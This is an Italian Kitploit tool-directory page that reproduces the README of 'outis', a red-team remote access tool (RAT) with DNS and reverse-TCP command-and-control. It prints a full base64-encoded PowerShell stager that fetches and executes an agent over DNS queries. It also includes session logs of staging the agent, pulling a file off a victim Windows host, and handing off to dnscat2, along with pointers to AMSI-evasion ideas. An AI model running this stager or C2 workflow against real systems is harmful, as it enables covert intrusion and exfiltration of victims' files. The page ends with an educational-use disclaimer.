Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
outis — outis è un tool di amministrazione remota (RAT) personalizzato o qualcosa del genere. È stato costruito per supportare vari metodi di trasporto (come DNS) e piattaforme (come Powershell). | Kitploit
Strumenti/GitHubGitHub/syss-research/outis
Generazione di PayloadPost-ExploitCommand and ControlRed TeamingStrumento di Accesso RemotoAnalisi DNS
GitHubsyss-research/outis

outis

outis è un tool di amministrazione remota (RAT) personalizzato o qualcosa del genere. È stato costruito per supportare vari metodi di trasporto (come DNS) e piattaforme (come Powershell).

Vedi Repository
126458 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

outis

outis è un tool personalizzato di Amministrazione Remota (RAT) o qualcosa del genere. Pensate a Meterpreter o Empire-Agent. Tuttavia, l'attenzione di questo tool non è né un kit di exploit (non ci sono exploit) né la gestione persistente dei target. L'obiettivo è comunicare tra server e sistema target e trasferire file, condividere socket, generare shell e così via utilizzando vari metodi e piattaforme.

Sul Nome

Il ciclope Polifemo nell'Odissea di Omero aveva qualche problema con la risoluzione dei nomi. Quando chiese il nome di Ulisse, l'hacker gli disse che era "Outis", che in greco antico significa "Nessuno". Così, quando Polifemo urlò che Nessuno stava per ucciderlo, stranamente non arrivò alcun aiuto. I miei ringraziamenti a Marcel per aver ricordato questo meraviglioso pezzo di storia classica.

Dipendenze per l'Handler

Gli utenti Archlinux possono installare i seguenti pacchetti:

  • python3 # includes cmd, tempfile, ...
  • python-progressbar2
  • python-dnspython
  • python-crypto
  • python-pyopenssl
  • and maybe more...

In altre distribuzioni i nomi possono differire; ad esempio, esiste un modulo chiamato crypto e uno chiamato pycrypto. Noi abbiamo bisogno del secondo.

Inoltre, versioni più vecchie potrebbero causare problemi:

  • pyopenssl needs to be version 16.1.0 or newer, check as follows:
root@kitploit:~
   $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'

Puoi configurare un ambiente virtuale Python abbastanza facilmente:

root@kitploit:~
$ virtualenv outis-venv
$ source ./outis-venv/bin/activate
(outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl

Ciò porta al seguente elenco di pacchetti, che sembra funzionare per me:

root@kitploit:~
$ pip freeze
appdirs==1.4.3
asn1crypto==0.22.0
cffi==1.10.0
cryptography==1.8.1
dnspython==1.15.0
idna==2.5
packaging==16.8
progressbar2==3.18.1
pycparser==2.17
pycrypto==2.6.1
pyOpenSSL==16.2.0
pyparsing==2.2.0
python-utils==2.1.0
six==1.10.0

Installazione

Clona questo repository git con il flag recursive per clonare anche i suoi sottomoduli nella cartella thirdpartytools:

root@kitploit:~
git clone --recursive ...

L'handler gira su Python 3. Installa le sue dipendenze ed eseguilo. Genererà stager, agent e tutto il resto per te.

Per associare porte basse senza bisogno di privilegi di root, considera l'uso di un wrapper di capability.

Termini

  • agent: software che gira sul sistema vittima
  • handler: software che analizza i tuoi comandi e guida gli agent (di solito gira sul tuo server)
  • stager: script breve che scarica l'agent (usando il modulo di trasporto) e lo esegue
  • transport: canale di comunicazione tra stager/agent e handler, es. ReverseTCP
  • platform: architettura della vittima da utilizzare per gli script stager/agent, es. PowerShell

Piattaforme attualmente supportate

  • PowerShell (parziale)

Trasporti attualmente supportati

  • Reverse TCP
  • DNS (tipi TXT o A per lo staging, e tipi TXT, CNAME, MX, AAAA o A per la connessione dell'agent)

Crittografia attualmente supportata

  • Gli stadi dell'agent possono essere codificati (per offuscamento, non per sicurezza) usando XOR ciclico
  • Gli stadi dell'agent possono essere autenticati usando firme RSA e certificati bloccati
  • Le connessioni di trasporto possono essere crittografate/autenticate usando TLS e certificati bloccati

Comandi e controlli attualmente supportati

  • richieste ping per testare la connessione (parziale)
  • formato messaggio di testo (parziale)
  • caricamento e download di file

Extra attualmente supportati

Quando si utilizza il trasporto DNS con stager e powershell, è possibile eseguire lo staging del tool dnscat2 / dnscat2-powershell dalla directory thirdpartytools invece dell'agent outis predefinito. Imposta l'opzione di piattaforma AGENTTYPE su DNSCAT2 (richiederà un po' di tempo, ma utilizza solo DNS per lo staging) o DNSCAT2DOWNLOADER (tenta di scaricare usando HTTPS).

Esempi di utilizzo

Il download di un file utilizzando il trasporto DNS con staging sulla piattaforma POWERSHELL potrebbe essere simile a questo:

root@kitploit:~
$ outis
outis> set TRANSPORT DNS
outis> set ZONE zfs.sy.gs
outis> set AGENTDEBUG TRUE
outis> info
[+] Options for the Handler:
Name               Value       Required  Description                                                      
-----------------  ----------  --------  -----------------------------------------------------------------
TRANSPORT          DNS         True      Communication way between agent and handler (Options: REVERSETCP,
                                          DNS)
CHANNELENCRYPTION  TLS         True      Encryption Protocol in the transport (Options: NONE, TLS)
PLATFORM           POWERSHELL  True      Platform of agent code (Options: POWERSHELL)
PROGRESSBAR        TRUE        True      Display a progressbar for uploading / downloading? (only if not 
                                         debugging the relevant module) (Options: TRUE, FALSE)

[+] Options for the TRANSPORT module DNS:
Name       Value        Required  Description                                                             
---------  -----------  --------  ------------------------------------------------------------------------
ZONE       zfs.sy.gs    True      DNS Zone for handling requests
LHOST      0.0.0.0      True      Interface IP to listen on
LPORT      53           True      UDP-Port to listen on for DNS server
DNSTYPE    TXT          True      DNS type to use for the connection (stager only, the agent will 
                                  enumerate all supported types on its own) (Options: TXT, A)
DNSSERVER               False     IP address of DNS server to connect for all queries

[+] Options for the PLATFORM module POWERSHELL:
Name                  Value                       Required  Description                                   
--------------------  --------------------------  --------  ----------------------------------------------
STAGED                TRUE                        True      Is the communication setup staged or not? 
                                                            (Options: TRUE, FALSE)
STAGEENCODING         TRUE                        True      Should we send the staged agent in an encoded 
                                                            form (obscurity, not for security!) (Options: 
                                                            TRUE, FALSE)
STAGEAUTHENTICATION   TRUE                        True      Should the stager verify the agent code 
                                                            before executing (RSA signature verification 
                                                            with certificate pinning) (Options: TRUE, 
                                                            FALSE)
STAGECERTIFICATEFILE  $TOOLPATH/data/outis.pem    False     File path of a PEM with both RSA key and 
                                                            certificate to sign and verify staged agent 
                                                            with (you can generate a selfsigned cert by 
                                                            using the script gencert.sh initially)
AGENTTYPE             DEFAULT                     True      Defines which agent should be used (the 
                                                            default outis agent for this plattform, or 
                                                            some third party software we support) 
                                                            (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)
TIMEOUT               9                           True      Number of seconds to wait for each request 
                                                            (currently only supported by DNS stagers)
RETRIES               2                           True      Retry each request for this number of times 
                                                            (currently only supported by DNS stagers)
AGENTDEBUG            TRUE                        True      Should the agent print and log debug messages 
                                                            (Options: TRUE, FALSE)
outis> generatestager
[+] Use the following stager code:
powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7
  ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA
  BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A
  UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG
  8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6
  ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA
  B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA
  LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH
  AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl
  AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw
  BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A
  YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE
  8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk
  ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw
  AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA
  aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF
  IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5
  AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw
 BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A
  VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG
  UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF
  AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=
outis> run
[+] DNS listening on 0.0.0.0:53
[+] Sending staged agent (34332 bytes)...
100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16
[+] Staging done
[+] Waiting for connection and TLS handshake...
[+] Initial connection with new agent started
[+] Upgrade to TLS done
outis session> [+] AGENT: Hello from Agent

outis session> download C:\testfile.txt /tmp/out.txt
[+] initiating download of remote file C:\testfile.txt to local file /tmp/out.txt
[+] agent reports a size of 3295 bytes for channel 1
100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00
[+] wrote 3295 bytes to file /tmp/out.txt
outis session> exit
Do you really want to exit the session and close the connection [y/N]? y
outis> exit

O forse vogliamo usare dnscat2 per il vero affare e usare semplicemente outis per il suo staging:

root@kitploit:~
$ outis
outis> set TRANSPORT DNS
outis> set AGENTTYPE DNSCAT2
outis> set ZONE zfs.sy.gs
outis> run
[+] DNS listening on 0.0.0.0:53
[+] Sending staged agent (406569 bytes)...
100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17
[+] Staging done
[+] Starting dnscat2 to handle the real connection

New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = zfs.sy.gs]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):

  ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> sessions
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]
  1 :: command (feynman-win7) [encrypted and verified] [*]
  
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt
Attempting to download c:/testfile.txt to /tmp/out.txt
Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!

command (feynman-win7) 1> exit
Input thread is over

Ispirazioni

Questo progetto è stato ispirato da (e ha spudoratamente rubato parte del suo codice da):

  • Empire:

    • https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py — generate_launcher usa uno stager HTTP(S)
    • https://github.com/adaptivethreat/Empire/tree/master/data/agent — stager (secondo passo dopo il launcher iniziale) e agent (terzo passo)
    • https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py — generazione e stripping di script powershell
  • Metasploit:

    • https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb — CmdStager per bourne, ...
  • ReflectiveDLLInjection:

    • https://github.com/stephenfewer/ReflectiveDLLInjection
  • p0wnedShell:

    • https://github.com/Cn33liz/p0wnedShell — alcune idee per l'evasione di AMSI per uso futuro
  • dnscat2:

    • https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md — idee sulla progettazione del protocollo su DNS
    • https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 — versione powershell dell'agent dnscat2
  • dnsftp

    • https://github.com/breenmachine/dnsftp — brevi parti di script per stager tramite DNS

Disclaimer

Usa a tuo rischio. Non usare senza il pieno consenso di tutti i soggetti coinvolti. Solo per scopi educativi.

Scarica lo strumento